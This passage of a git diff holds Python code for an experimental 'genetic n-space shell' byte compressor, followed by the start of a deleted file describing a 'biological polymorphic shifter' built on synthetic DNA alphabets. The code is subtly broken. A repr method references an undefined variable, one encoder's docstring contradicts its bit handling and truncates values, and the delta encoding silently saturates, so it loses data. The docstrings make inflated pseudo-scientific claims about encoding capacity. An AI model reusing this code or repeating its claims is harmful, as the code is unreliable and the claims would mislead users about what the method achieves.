for ti in self.t:
|
|
||||||
m *= ti * (self.k - ti + 1)
|
|
||||||
return m
|
|
||||||
|
|
||||||
@property
|
|
||||||
def is_endpoint(self) -> bool:
|
|
||||||
"""Zero mass iff all offsets are 0 (perfect d-th power)."""
|
|
||||||
return self.mass == 0
|
|
||||||
|
|
||||||
def mirror(self) -> 'NShellCoordinate':
|
|
||||||
"""Mirror involution: t[i] → k - t[i], preserves mass.
|
|
||||||
|
|
||||||
Generalizes model 580 to d dimensions.
|
|
||||||
"""
|
|
||||||
mirrored = [self.k - ti for ti in self.t]
|
|
||||||
return NShellCoordinate(k=self.k, t=mirrored, d=self.d)
|
|
||||||
|
|
||||||
def is_resonant_with(self, other: 'NShellCoordinate') -> bool:
|
|
||||||
"""Generalized resonance: equal mass (model 582)."""
|
|
||||||
return self.mass == other.mass
|
|
||||||
|
|
||||||
def is_cross_resonant(self, other: 'NShellCoordinate') -> bool:
|
|
||||||
"""Cross-dimensional resonance: mass equality across different d."""
|
|
||||||
return self.mass == other.mass # works even if self.d != other.d
|
|
||||||
|
|
||||||
@property
|
|
||||||
def rho(self) -> List[float]:
|
|
||||||
"""Normalized tension per dimension (generalized model 585)."""
|
|
||||||
return [ti / max(self.k + 1, 1) for ti in self.t]
|
|
||||||
|
|
||||||
@property
|
|
||||||
def tension_gradient(self) -> List[float]:
|
|
||||||
"""∇mass — direction of steepest mass increase in d-space."""
|
|
||||||
grad = []
|
|
||||||
for ti in self.t:
|
|
||||||
# ∂mass/∂t_i = Π_{j≠i} t_j·(k-t_j+1) · (k - 2t_i + 1)
|
|
||||||
partial = 1
|
|
||||||
for j, tj in enumerate(self.t):
|
|
||||||
if j != len(grad): # not current dimension
|
|
||||||
partial *= tj * (self.k - tj + 1)
|
|
||||||
# The derivative factor for dimension i
|
|
||||||
d_factor = self.k - 2*ti + 1
|
|
||||||
grad.append(partial * d_factor)
|
|
||||||
return grad
|
|
||||||
|
|
||||||
def to_tuple(self) -> Tuple[int, ...]:
|
|
||||||
return (self.k,) + tuple(self.t)
|
|
||||||
|
|
||||||
def __repr__(self) -> str:
|
|
||||||
return (f"NS{d}Shell(k={self.k}, t={self.t}, "
|
|
||||||
f"mass={self.mass})")
|
|
||||||
|
|
||||||
|
|
||||||
# ════════════════════════════════════════════════════════════════
|
|
||||||
# 3. GENETIC N-SPACE SHELL MAPPER
|
|
||||||
# ════════════════════════════════════════════════════════════════
|
|
||||||
|
|
||||||
class GeneticNShellMapper:
|
|
||||||
"""Builds n-dimensional shell coordinates using genetic encoding.
|
|
||||||
|
|
||||||
Every byte is mapped through a genetic code table to produce
|
|
||||||
a coordinate in d-dimensional shell space. Multiple code tables
|
|
||||||
and dimensions are available.
|
|
||||||
"""
|
|
||||||
|
|
||||||
# Codon bases lookup: byte → 3-base codon
|
|
||||||
CODON_BASES = ['A', 'C', 'G', 'T']
|
|
||||||
|
|
||||||
def __init__(self,
|
|
||||||
dimension: int = 3,
|
|
||||||
code_table: str = 'standard',
|
|
||||||
use_rna: bool = False):
|
|
||||||
assert dimension >= 1, "Dimension must be >= 1"
|
|
||||||
assert code_table in GENETIC_CODE_TABLES, f"Unknown table: {code_table}"
|
|
||||||
|
|
||||||
self.d = dimension
|
|
||||||
self.code_table_name = code_table
|
|
||||||
self.table = GENETIC_CODE_TABLES[code_table]
|
|
||||||
self.bases = RNA_BASES if use_rna else BASES
|
|
||||||
|
|
||||||
# Precompute all 64 codon → AA mappings
|
|
||||||
self._codon_cache: Dict[Tuple[int,int,int], str] = {}
|
|
||||||
|
|
||||||
def byte_to_codon(self, b: int) -> Tuple[str, str, str]:
|
|
||||||
"""Map a byte (0-255) to a DNA/RNA codon triplet.
|
|
||||||
|
|
||||||
Uses modular arithmetic over {A, C, G, T}:
|
|
||||||
byte 0-63: direct codon mapping (6 bits)
|
|
||||||
byte 64-255: upper bits modulate the translation
|
|
||||||
"""
|
|
||||||
idx = b & 0x3F # 6 bits = 64 codons
|
|
||||||
b1 = self.bases[(idx >> 4) & 0x3]
|
|
||||||
b2 = self.bases[(idx >> 2) & 0x3]
|
|
||||||
b3 = self.bases[idx & 0x3]
|
|
||||||
return (b1, b2, b3)
|
|
||||||
|
|
||||||
def byte_to_aa(self, b: int) -> str:
|
|
||||||
"""Translate a byte through the genetic code to an amino acid."""
|
|
||||||
codon = self.byte_to_codon(b)
|
|
||||||
return self.table.get(codon, 'Stop')
|
|
||||||
|
|
||||||
def byte_to_rank(self, b: int, context: Optional[int] = None) -> int:
|
|
||||||
"""Map a byte to a natural number rank for shell encoding.
|
|
||||||
|
|
||||||
The rank incorporates:
|
|
||||||
- The amino acid index (0-22)
|
|
||||||
- The codon position (0-63)
|
|
||||||
- Optional context byte for contextual encoding
|
|
||||||
"""
|
|
||||||
aa = self.byte_to_aa(b)
|
|
||||||
aa_idx = AA_ORDER.get(aa, 0)
|
|
||||||
codon_idx = b & 0x3F
|
|
||||||
|
|
||||||
# Rank = aa_index * 64 + codon_idx + context modulation
|
|
||||||
rank = aa_idx * 64 + codon_idx
|
|
||||||
|
|
||||||
if context is not None:
|
|
||||||
# Context byte modulates the rank within the same AA group
|
|
||||||
context_mod = (context & 0x3F) % 64
|
|
||||||
rank = aa_idx * 64 + ((codon_idx + context_mod) % 64)
|
|
||||||
|
|
||||||
return rank
|
|
||||||
|
|
||||||
def encode_byte(self, b: int,
|
|
||||||
context: Optional[int] = None,
|
|
||||||
return_coord: bool = True) -> NShellCoordinate:
|
|
||||||
"""Map a byte to an n-dimensional shell coordinate."""
|
|
||||||
rank = self.byte_to_rank(b, context)
|
|
||||||
return NShellCoordinate.encode(rank, self.d)
|
|
||||||
|
|
||||||
def build_shell_map(self, data: bytes) -> Dict[int, NShellCoordinate]:
|
|
||||||
"""Build shell coordinates for all bytes in data.
|
|
||||||
|
|
||||||
Returns dict: byte_position → NShellCoordinate
|
|
||||||
"""
|
|
||||||
coords: Dict[int, NShellCoordinate] = {}
|
|
||||||
for i, b in enumerate(data):
|
|
||||||
context = data[i-1] if i > 0 else None
|
|
||||||
coords[i] = self.encode_byte(b, context)
|
|
||||||
return coords
|
|
||||||
|
|
||||||
def resonance_groups(self, data: bytes) -> Dict[int, List[int]]:
|
|
||||||
"""Group byte positions by shell mass (resonance class).
|
|
||||||
|
|
||||||
Returns: mass → [positions with that mass]
|
|
||||||
"""
|
|
||||||
groups: Dict[int, List[int]] = defaultdict(list)
|
|
||||||
shell_map = self.build_shell_map(data)
|
|
||||||
for pos, coord in shell_map.items():
|
|
||||||
groups[coord.mass].append(pos)
|
|
||||||
return dict(groups)
|
|
||||||
|
|
||||||
def code_table_diversity(self) -> int:
|
|
||||||
"""Number of distinct AA translations across all 64 codons."""
|
|
||||||
seen = set()
|
|
||||||
for i in range(64):
|
|
||||||
b1 = self.bases[(i >> 4) & 0x3]
|
|
||||||
b2 = self.bases[(i >> 2) & 0x3]
|
|
||||||
b3 = self.bases[i & 0x3]
|
|
||||||
seen.add(self.table.get((b1, b2, b3), '?'))
|
|
||||||
return len(seen)
|
|
||||||
|
|
||||||
@property
|
|
||||||
def degeneracy(self) -> float:
|
|
||||||
"""Model 1276-1280: Average codons per amino acid."""
|
|
||||||
aa_counts = Counter()
|
|
||||||
for i in range(64):
|
|
||||||
b1 = self.bases[(i >> 4) & 0x3]
|
|
||||||
b2 = self.bases[(i >> 2) & 0x3]
|
|
||||||
b3 = self.bases[i & 0x3]
|
|
||||||
aa = self.table.get((b1, b2, b3), 'Stop')
|
|
||||||
aa_counts[aa] += 1
|
|
||||||
# Exclude Stop for meaningful average
|
|
||||||
non_stop = {k: v for k, v in aa_counts.items() if k != 'Stop'}
|
|
||||||
if not non_stop:
|
|
||||||
return 0.0
|
|
||||||
return sum(non_stop.values()) / len(non_stop)
|
|
||||||
|
|
||||||
|
|
||||||
# ════════════════════════════════════════════════════════════════
|
|
||||||
# 4. N-SPACE DELTA ENCODER
|
|
||||||
# ════════════════════════════════════════════════════════════════
|
|
||||||
|
|
||||||
class NSpaceDeltaEncoder:
|
|
||||||
"""Delta-encode sequences of NShellCoordinates.
|
|
||||||
|
|
||||||
Leverages the fact that within a resonance group,
|
|
||||||
coordinates differ by small amounts in shell space.
|
|
||||||
"""
|
|
||||||
|
|
||||||
def __init__(self):
|
|
||||||
self.prev: Optional[NShellCoordinate] = None
|
|
||||||
|
|
||||||
def encode_delta(self, coord: NShellCoordinate) -> bytes:
|
|
||||||
"""Encode a single coordinate as delta from previous.
|
|
||||||
|
|
||||||
Format: [delta_k][delta_t_1]...[delta_t_d][delta_mass_hi][delta_mass_lo]
|
|
||||||
Each delta is variable-length encoded.
|
|
||||||
"""
|
|
||||||
if self.prev is None:
|
|
||||||
# Full encoding for first coordinate
|
|
||||||
encoded = self._encode_full(coord)
|
|
||||||
self.prev = coord
|
|
||||||
return encoded
|
|
||||||
|
|
||||||
# Compute deltas across all dimensions
|
|
||||||
dk = coord.k - self.prev.k
|
|
||||||
dt = [coord.t[i] - self.prev.t[i] for i in range(coord.d)]
|
|
||||||
dm = coord.mass - self.prev.mass
|
|
||||||
|
|
||||||
# Pack deltas efficiently using variable-length encoding
|
|
||||||
# Small deltas (within [-63, 63]) use 1 byte: 0xxx_xxxx
|
|
||||||
# Large deltas use 2 bytes: 1xxx_xxxx xxxx_xxxx
|
|
||||||
encoded = bytearray()
|
|
||||||
encoded.append(self._encode_vlq(dk))
|
|
||||||
for dti in dt:
|
|
||||||
encoded.append(self._encode_vlq(dti))
|
|
||||||
encoded.extend(self._encode_vlq_s16(dm))
|
|
||||||
|
|
||||||
self.prev = coord
|
|
||||||
return bytes(encoded)
|
|
||||||
|
|
||||||
def _encode_vlq(self, val: int) -> int:
|
|
||||||
"""Variable-length encode a small integer to byte.
|
|
||||||
|
|
||||||
-64..63 → 0xxxxxxx (7-bit signed)
|
|
||||||
Otherwise saturate.
|
|
||||||
"""
|
|
||||||
if val < -64:
|
|
||||||
return 0x40 # min
|
|
||||||
if val > 63:
|
|
||||||
return 0x3F # max
|
|
||||||
return val & 0x7F
|
|
||||||
|
|
||||||
def _encode_vlq_s16(self, val: int) -> Tuple[int, int]:
|
|
||||||
"""Encode 16-bit signed integer as 2 bytes.
|
|
||||||
|
|
||||||
If value fits in [-2048, 2047], use 1-byte format
|
|
||||||
(bit 7 = 0, bits 0-6 = 7-bit signed).
|
|
||||||
Otherwise 2-byte format (bit 15 = 1, bits 0-14 = 15-bit signed).
|
|
||||||
"""
|
|
||||||
if -2048 <= val <= 2047:
|
|
||||||
# 1 byte: bit 7 = 0 (small), bits 0-6 = 7-bit signed
|
|
||||||
return (val & 0x7F, 0x80) # second byte marks "end"
|
|
||||||
else:
|
|
||||||
# 2 bytes: bit 15 = 1 (large), bits 0-14 = 15-bit signed
|
|
||||||
hi = ((val >> 8) & 0x7F) | 0x80
|
|
||||||
lo = val & 0xFF
|
|
||||||
return (hi, lo)
|
|
||||||
|
|
||||||
def _encode_full(self, coord: NShellCoordinate) -> bytes:
|
|
||||||
"""Full encoding (not delta)."""
|
|
||||||
packed = bytearray()
|
|
||||||
# k as 1 byte (for small shells) or 2 bytes
|
|
||||||
if coord.k < 256:
|
|
||||||
packed.append(coord.k & 0xFF)
|
|
||||||
else:
|
|
||||||
packed.append(0xFF)
|
|
||||||
packed.append((coord.k >> 8) & 0xFF)
|
|
||||||
packed.append(coord.k & 0xFF)
|
|
||||||
|
|
||||||
# Each t[i] as 1 byte
|
|
||||||
for ti in coord.t:
|
|
||||||
packed.append(min(ti, 255) & 0xFF)
|
|
||||||
|
|
||||||
# Mass as 2 bytes
|
|
||||||
packed.append((coord.mass >> 8) & 0xFF)
|
|
||||||
packed.append(coord.mass & 0xFF)
|
|
||||||
|
|
||||||
return bytes(packed)
|
|
||||||
|
|
||||||
def reset(self):
|
|
||||||
self.prev = None
|
|
||||||
|
|
||||||
|
|
||||||
# ════════════════════════════════════════════════════════════════
|
|
||||||
# 5. SHAPE EXPANSION ANALYZER
|
|
||||||
# ════════════════════════════════════════════════════════════════
|
|
||||||
|
|
||||||
class ShapeExpansionAnalyzer:
|
|
||||||
"""Analyzes how different dimensions/shapes affect encoding.
|
|
||||||
|
|
||||||
For each dimension d (1..n), computes:
|
|
||||||
- Shell statistics (mass distribution, resonance groups)
|
|
||||||
- Encoding efficiency estimates
|
|
||||||
- Cross-dimensional resonance opportunities
|
|
||||||
"""
|
|
||||||
|
|
||||||
def __init__(self, data: bytes):
|
|
||||||
self.data = data
|
|
||||||
self.seen: Dict[int, Dict[int, Counter]] = {} # dim → mass → count
|
|
||||||
|
|
||||||
def analyze_dimension(self, d: int,
|
|
||||||
code_table: str = 'standard') -> Dict[str, Any]:
|
|
||||||
"""Analyze shell statistics for dimension d."""
|
|
||||||
mapper = GeneticNShellMapper(dimension=d, code_table=code_table)
|
|
||||||
coords = mapper.build_shell_map(self.data)
|
|
||||||
|
|
||||||
n = len(self.data)
|
|
||||||
masses = [c.mass for c in coords.values()]
|
|
||||||
unique_masses = len(set(masses))
|
|
||||||
endpoint_count = sum(1 for c in coords.values() if c.is_endpoint)
|
|
||||||
nonzero_masses = [m for m in masses if m > 0]
|
|
||||||
avg_mass = sum(nonzero_masses) / max(len(nonzero_masses), 1)
|
|
||||||
|
|
||||||
# Resonance group sizes
|
|
||||||
groups = mapper.resonance_groups(self.data)
|
|
||||||
group_sizes = [len(v) for v in groups.values()]
|
|
||||||
avg_group_size = sum(group_sizes) / max(len(group_sizes), 1)
|
|
||||||
|
|
||||||
# Entropy of mass distribution (how predictable)
|
|
||||||
mass_entropy = 0.0
|
|
||||||
mass_counts = Counter(masses)
|
|
||||||
for count in mass_counts.values():
|
|
||||||
p = count / n
|
|
||||||
mass_entropy -= p * math.log2(p)
|
|
||||||
|
|
||||||
return {
|
|
||||||
'd': d,
|
|
||||||
'unique_masses': unique_masses,
|
|
||||||
'endpoint_fraction': endpoint_count / n if n > 0 else 0,
|
|
||||||
'avg_mass': avg_mass,
|
|
||||||
'avg_resonance_group_size': avg_group_size,
|
|
||||||
'mass_entropy': mass_entropy,
|
|
||||||
'code_table_diversity': mapper.code_table_diversity(),
|
|
||||||
'degeneracy': mapper.degeneracy,
|
|
||||||
'n_shell_count': len(coords),
|
|
||||||
}
|
|
||||||
|
|
||||||
def find_optimal_dimension(self,
|
|
||||||
max_d: int = 8,
|
|
||||||
code_table: str = 'standard') -> int:
|
|
||||||
"""Find dimension that minimizes mass entropy.
|
|
||||||
|
|
||||||
Lower mass entropy → more structured → better compression.
|
|
||||||
"""
|
|
||||||
best_d = 2
|
|
||||||
best_entropy = float('inf')
|
|
||||||
|
|
||||||
for d in range(1, max_d + 1):
|
|
||||||
stats = self.analyze_dimension(d, code_table)
|
|
||||||
entropy = stats['mass_entropy']
|
|
||||||
|
|
||||||
if entropy < best_entropy:
|
|
||||||
best_entropy = entropy
|
|
||||||
best_d = d
|
|
||||||
|
|
||||||
return best_d
|
|
||||||
|
|
||||||
def best_code_table(self, d: int = 3) -> Tuple[str, float]:
|
|
||||||
"""Find code table that maximizes shell structure."""
|
|
||||||
best_table = 'standard'
|
|
||||||
best_score = 0.0
|
|
||||||
|
|
||||||
for table_name in GENETIC_CODE_TABLES:
|
|
||||||
stats = self.analyze_dimension(d, table_name)
|
|
||||||
# Score: low mass entropy + high resonance group size
|
|
||||||
score = (1.0 / max(stats['mass_entropy'], 0.01)) * \
|
|
||||||
stats['avg_resonance_group_size']
|
|
||||||
if score > best_score:
|
|
||||||
best_score = score
|
|
||||||
best_table = table_name
|
|
||||||
|
|
||||||
return best_table, best_score
|
|
||||||
|
|
||||||
def cross_dimensional_resonances(self,
|
|
||||||
d1: int,
|
|
||||||
d2: int) -> List[Tuple[int, int, int]]:
|
|
||||||
"""Find cross-dimensional resonances between dimensions d1 and d2.
|
|
||||||
|
|
||||||
Returns: [(byte_pos_d1, byte_pos_d2, shared_mass)]
|
|
||||||
"""
|
|
||||||
mapper1 = GeneticNShellMapper(dimension=d1)
|
|
||||||
mapper2 = GeneticNShellMapper(dimension=d2)
|
|
||||||
|
|
||||||
coords1 = mapper1.build_shell_map(self.data)
|
|
||||||
coords2 = mapper2.build_shell_map(self.data)
|
|
||||||
|
|
||||||
# Build mass → positions for each dimension
|
|
||||||
mass_to_pos1: Dict[int, List[int]] = defaultdict(list)
|
|
||||||
mass_to_pos2: Dict[int, List[int]] = defaultdict(list)
|
|
||||||
|
|
||||||
for pos, c in coords1.items():
|
|
||||||
mass_to_pos1[c.mass].append(pos)
|
|
||||||
for pos, c in coords2.items():
|
|
||||||
mass_to_pos2[c.mass].append(pos)
|
|
||||||
|
|
||||||
# Find shared masses
|
|
||||||
shared_masses = set(mass_to_pos1.keys()) & set(mass_to_pos2.keys())
|
|
||||||
|
|
||||||
resonances = []
|
|
||||||
for mass in sorted(shared_masses)[:50]: # limit output
|
|
||||||
for p1 in mass_to_pos1[mass][:3]:
|
|
||||||
for p2 in mass_to_pos2[mass][:3]:
|
|
||||||
resonances.append((p1, p2, mass))
|
|
||||||
|
|
||||||
return resonances
|
|
||||||
|
|
||||||
|
|
||||||
# ════════════════════════════════════════════════════════════════
|
|
||||||
# 6. GENSIS ENCODER — Unified Genetic N-Space Compressor
|
|
||||||
# ════════════════════════════════════════════════════════════════
|
|
||||||
|
|
||||||
@dataclass
|
|
||||||
class GENSISBlock:
|
|
||||||
"""Output of GENSIS encoding for one block."""
|
|
||||||
dimension: int
|
|
||||||
code_table: str
|
|
||||||
shell_coords: List[NShellCoordinate]
|
|
||||||
delta_encoded: bytes
|
|
||||||
resonance_groups: Dict[int, List[int]]
|
|
||||||
mass_entropy: float
|
|
||||||
cross_resonances: List[Tuple[int, int, int]]
|
|
||||||
|
|
||||||
|
|
||||||
class GENSISEncoder:
|
|
||||||
"""Unified Genetic N-Space Shell Encoder.
|
|
||||||
|
|
||||||
1. Select optimal code table + dimension for data
|
|
||||||
2. Encode to n-dimensional shell coordinates
|
|
||||||
3. Delta-encode within resonance groups
|
|
||||||
4. Detect cross-dimensional resonances
|
|
||||||
5. Report shell statistics for MISC pipeline
|
|
||||||
"""
|
|
||||||
|
|
||||||
def __init__(self, max_dim_search: int = 6):
|
|
||||||
self.max_dim_search = max_dim_search
|
|
||||||
self.delta_encoder = NSpaceDeltaEncoder()
|
|
||||||
|
|
||||||
def encode(self, data: bytes) -> GENSISBlock:
|
|
||||||
"""Full GENSIS encoding pipeline."""
|
|
||||||
analyzer = ShapeExpansionAnalyzer(data)
|
|
||||||
|
|
||||||
# Step 1: Find optimal dimension
|
|
||||||
d = analyzer.find_optimal_dimension(self.max_dim_search)
|
|
||||||
|
|
||||||
# Step 2: Find best code table for this dimension
|
|
||||||
table, table_score = analyzer.best_code_table(d)
|
|
||||||
|
|
||||||
# Step 3: Encode to n-shell coordinates
|
|
||||||
mapper = GeneticNShellMapper(dimension=d, code_table=table)
|
|
||||||
coords = mapper.build_shell_map(data)
|
|
||||||
|
|
||||||
# Step 4: Delta encode coordinate sequence
|
|
||||||
self.delta_encoder.reset()
|
|
||||||
delta_bytes = bytearray()
|
|
||||||
sorted_positions = sorted(coords.keys())
|
|
||||||
for pos in sorted_positions:
|
|
||||||
delta_bytes.extend(self.delta_encoder.encode_delta(coords[pos]))
|
|
||||||
|
|
||||||
# Step 5: Find resonance groups
|
|
||||||
groups = mapper.resonance_groups(data)
|
|
||||||
|
|
||||||
# Step 6: Check cross-dimensional resonances
|
|
||||||
cross = []
|
|
||||||
for other_d in range(1, self.max_dim_search + 1):
|
|
||||||
if other_d != d:
|
|
||||||
cross.extend(analyzer.cross_dimensional_resonances(d, other_d))
|
|
||||||
|
|
||||||
# Mass entropy
|
|
||||||
masses = [c.mass for c in coords.values()]
|
|
||||||
mass_entropy = 0.0
|
|
||||||
mass_counts = Counter(masses)
|
|
||||||
n = len(data)
|
|
||||||
for count in mass_counts.values():
|
|
||||||
p = count / n
|
|
||||||
if p > 0:
|
|
||||||
mass_entropy -= p * math.log2(p)
|
|
||||||
|
|
||||||
return GENSISBlock(
|
|
||||||
dimension=d,
|
|
||||||
code_table=table,
|
|
||||||
shell_coords=list(coords.values()),
|
|
||||||
delta_encoded=bytes(delta_bytes),
|
|
||||||
resonance_groups=groups,
|
|
||||||
mass_entropy=mass_entropy,
|
|
||||||
cross_resonances=cross[:20], # limit output
|
|
||||||
)
|
|
||||||
|
|
||||||
|
|
||||||
# ════════════════════════════════════════════════════════════════
|
|
||||||
# 7. DEMO & SELF-TEST
|
|
||||||
# ════════════════════════════════════════════════════════════════
|
|
||||||
|
|
||||||
def print_shell_stats(data: bytes):
|
|
||||||
"""Print comprehensive shell encoding analysis."""
|
|
||||||
print(f"\n{'='*60}")
|
|
||||||
print(f" GENSIS — Genetic N-Space Shell Encoding")
|
|
||||||
print(f" Data: {len(data)} bytes")
|
|
||||||
print(f"{'='*60}")
|
|
||||||
|
|
||||||
for d in range(1, 7):
|
|
||||||
for table_name in ['standard', 'vert_mito']:
|
|
||||||
mapper = GeneticNShellMapper(dimension=d, code_table=table_name)
|
|
||||||
coords = mapper.build_shell_map(data)
|
|
||||||
|
|
||||||
if not coords:
|
|
||||||
continue
|
|
||||||
|
|
||||||
masses = [c.mass for c in coords.values()]
|
|
||||||
unique_masses = len(set(masses))
|
|
||||||
endpoints = sum(1 for c in coords.values() if c.is_endpoint)
|
|
||||||
|
|
||||||
print(f" d={d} | {table_name:12s} | "
|
|
||||||
f"shells={unique_masses:4d} | "
|
|
||||||
f"endpoints={endpoints:3d} | "
|
|
||||||
f"avg_mass={sum(masses)/max(len(masses),1):.1f} | "
|
|
||||||
f"degeneracy={mapper.degeneracy:.2f}")
|
|
||||||
|
|
||||||
# Best dimension recommendation
|
|
||||||
analyzer = ShapeExpansionAnalyzer(data)
|
|
||||||
best_d = analyzer.find_optimal_dimension()
|
|
||||||
best_table, _ = analyzer.best_code_table(best_d)
|
|
||||||
print(f"\n ▶ Recommended: d={best_d}, code_table='{best_table}'")
|
|
||||||
|
|
||||||
# Cross-dimensional resonances
|
|
||||||
cross = analyzer.cross_dimensional_resonances(best_d, best_d + 1 if best_d < 6 else best_d)
|
|
||||||
if cross:
|
|
||||||
print(f" ▶ Cross-dimensional resonances: {len(cross)} found")
|
|
||||||
|
|
||||||
|
|
||||||
def demo():
|
|
||||||
"""Run GENSIS demonstration on various data."""
|
|
||||||
test_data = [
|
|
||||||
(b"The quick brown fox jumps over the lazy dog." * 5, "English text"),
|
|
||||||
(b"AAAAACCCCCGGGGGTTTTTAAAAACCCCCGGGGGTTTTT" * 5, "DNA-like repeats"),
|
|
||||||
(bytes(range(256)) * 2, "All 256 bytes, 2x"),
|
|
||||||
(b"AGCTAGCTAGCTAGCTAGCTAGCTAGCTAGCT" * 8, "AGCT repeats (highly structured)"),
|
|
||||||
]
|
|
||||||
|
|
||||||
for data, desc in test_data:
|
|
||||||
print(f"\n{'─'*60}")
|
|
||||||
print(f" Test: {desc}")
|
|
||||||
print(f"{'─'*60}")
|
|
||||||
print_shell_stats(data)
|
|
||||||
|
|
||||||
# Full encode
|
|
||||||
encoder = GENSISEncoder()
|
|
||||||
result = encoder.encode(data)
|
|
||||||
print(f"\n Encoded: {len(result.delta_encoded)} delta bytes "
|
|
||||||
f"(vs {len(data)} raw)")
|
|
||||||
print(f" Dimension: {result.dimension}, "
|
|
||||||
f"Table: {result.code_table}, "
|
|
||||||
f"Mass entropy: {result.mass_entropy:.3f}")
|
|
||||||
print(f" Resonance groups: {len(result.resonance_groups)}")
|
|
||||||
print(f" Cross-resonances: {len(result.cross_resonances)}")
|
|
||||||
|
|
||||||
|
|
||||||
if __name__ == "__main__":
|
|
||||||
demo()
|
|
||||||
File diff suppressed because it is too large
Load diff
|
|
@ -1,479 +0,0 @@
|
||||||
#!/usr/bin/env python3
|
|
||||||
"""
|
|
||||||
PIST Biological Polymorphic Shifter v3.0
|
|
||||||
=========================================
|
|
||||||
Hyperdimensional biological manifold compressor where every encoding modality
|
|
||||||
is a polymorphic shifter that transforms manifold state. ANY combination with
|
|
||||||
ANY combination is allowed as long as it increases fitness (compression × computation × stability).
|
|
||||||
|
|
||||||
Synthetic DNA Alphabets:
|
|
||||||
Hachimoji (8-letter), AEGIS (12+ letter), Hydrophobic Pairs, Shape-Complementary Pairs
|
|
||||||
Backbone XNAs: PNA, LNA, TNA, GNA, HNA, CeNA, FANA, Morpholino, Spiegelmer
|
|
||||||
|
|
||||||
RNA Processing:
|
|
||||||
Transcription, Translation (codon→peptide), Splicing, Editing, Interference (siRNA, miRNA, piRNA)
|
|
||||||
lncRNA regulation, Riboswitches, Ribozymes
|
|
||||||
|
|
||||||
Prion/Epigenetic:
|
|
||||||
Self-propagating conformational shift, Histone modification, DNA methylation, Chromatin remodeling
|
|
||||||
|
|
||||||
Neuronal Encoding:
|
|
||||||
Spike timing, STDP plasticity, Rate coding, Burst coding, Oscillatory phase coding
|
|
||||||
|
|
||||||
Mycelial/Fungal:
|
|
||||||
Hyphal network routing, Spore dispersal, Symbiotic exchange, Quorum sensing
|
|
||||||
|
|
||||||
Cellular Automata:
|
|
||||||
Wireworld, Game of Life, Rule 30, Rule 110 (as discrete state machine shifters)
|
|
||||||
|
|
||||||
n() Notation: Every shifter has an exponential amplification factor.
|
|
||||||
n(shifter) = base^depth where depth = how many times the shifter has been applied.
|
|
||||||
This represents combinatorial explosion of encoding capacity.
|
|
||||||
|
|
||||||
Usage:
|
|
||||||
python3 pist_biological_polymorphic_shifter_v3.py
|
|
||||||
"""
|
|
||||||
|
|
||||||
import struct
|
|
||||||
import math
|
|
||||||
import json
|
|
||||||
import time
|
|
||||||
import random
|
|
||||||
import sys
|
|
||||||
from collections import Counter, defaultdict
|
|
||||||
from heapq import heappush, heappop
|
|
||||||
from itertools import product, combinations, chain
|
|
||||||
from functools import lru_cache
|
|
||||||
from copy import deepcopy
|
|
||||||
|
|
||||||
# ═══════════════════════════════════════════════════════════════════════════════
|
|
||||||
# CONSTANTS
|
|
||||||
# ═══════════════════════════════════════════════════════════════════════════════
|
|
||||||
|
|
||||||
PHI = (1 + 5**0.5) / 2 # golden ratio ≈ 1.618
|
|
||||||
E = math.e
|
|
||||||
PI = math.pi
|
|
||||||
|
|
||||||
# Prime numbers for Galois field operations
|
|
||||||
GALOIS_PRIME = 251 # largest prime ≤ 255
|
|
||||||
GALOIS_PRIMITIVE = 86 # primitive element mod 251
|
|
||||||
|
|
||||||
# ── Synthetic Genetic Alphabets ─────────────────────────────────────────────
|
|
||||||
# Each letter maps to a bit pattern
|
|
||||||
|
|
||||||
HACHIMOJI_ALPHABET = {
|
|
||||||
# Natural bases
|
|
||||||
'A': 0b0000, # Adenine
|
|
||||||
'T': 0b0001, # Thymine
|
|
||||||
'C': 0b0010, # Cytosine
|
|
||||||
'G': 0b0011, # Guanine
|
|
||||||
# Synthetic bases
|
|
||||||
'Z': 0b0100, # 6-amino-5-nitropyridin-2-one (pairs with P)
|
|
||||||
'P': 0b0101, # 2-aminoimidazo[1,2-a][1,3,5]triazin-4(8H)-one (pairs with Z)
|
|
||||||
'S': 0b0110, # 3-methyl-6-amino-5-(1-propynyl)-pyrimidin-2-one (pairs with B)
|
|
||||||
'B': 0b0111, # 6-amino-9H-purin-2-ol (pairs with S)
|
|
||||||
}
|
|
||||||
# 8 letters = 3 bits per letter, 2.67x density vs binary
|
|
||||||
|
|
||||||
AEGIS_ALPHABET = {
|
|
||||||
**HACHIMOJI_ALPHABET,
|
|
||||||
'V': 0b1000, # pairs with J
|
|
||||||
'J': 0b1001, # pairs with V
|
|
||||||
'K': 0b1010, # pairs with X
|
|
||||||
'X': 0b1011, # pairs with K
|
|
||||||
}
|
|
||||||
# 12 letters = ~3.58 bits per letter
|
|
||||||
|
|
||||||
ROMESBERG_ALPHABET = {
|
|
||||||
'NaM': 0b00, # naphthalene derivative
|
|
||||||
'5SICS': 0b01, # pairs with NaM (hydrophobic)
|
|
||||||
'TPT3': 0b10, # optimized partner for NaM
|
|
||||||
'dNaM': 0b11, # alternative NaM variant
|
|
||||||
}
|
|
||||||
# 4 hydrophobic letters = 2 bits per letter
|
|
||||||
|
|
||||||
HIRAO_ALPHABET = {
|
|
||||||
'Ds': 0b00, # 7-(2-thienyl)-imidazo[4,5-b]pyridine
|
|
||||||
'Px': 0b01, # 2-nitro-4-propynylpyrrole
|
|
||||||
'Pa': 0b10, # pyrrole-2-carbaldehyde (older)
|
|
||||||
'dK': 0b11, # alternative shape-complementary
|
|
||||||
}
|
|
||||||
# 4 shape-complementary letters = 2 bits per letter
|
|
||||||
|
|
||||||
# Collection of all known synthetic DNA letters
|
|
||||||
ALL_SYNTHETIC_BASES = {
|
|
||||||
# Natural
|
|
||||||
'A', 'T', 'C', 'G', 'U',
|
|
||||||
# Hachimoji
|
|
||||||
'Z', 'P', 'S', 'B',
|
|
||||||
# AEGIS extended
|
|
||||||
'V', 'J', 'K', 'X',
|
|
||||||
'isoC', 'isoG',
|
|
||||||
# Romesberg hydrophobic
|
|
||||||
'NaM', '5SICS', 'TPT3', 'dNaM',
|
|
||||||
# Hirao shape-complementary
|
|
||||||
'Ds', 'Px', 'Pa', 'dK',
|
|
||||||
}
|
|
||||||
|
|
||||||
BASE_PAIRS = {
|
|
||||||
# Natural Watson-Crick
|
|
||||||
'A': 'T', 'T': 'A', 'C': 'G', 'G': 'C', 'U': 'A',
|
|
||||||
# Hachimoji
|
|
||||||
'Z': 'P', 'P': 'Z', 'S': 'B', 'B': 'S',
|
|
||||||
# AEGIS
|
|
||||||
'V': 'J', 'J': 'V', 'K': 'X', 'X': 'K',
|
|
||||||
'isoC': 'isoG', 'isoG': 'isoC',
|
|
||||||
# Romesberg hydrophobic
|
|
||||||
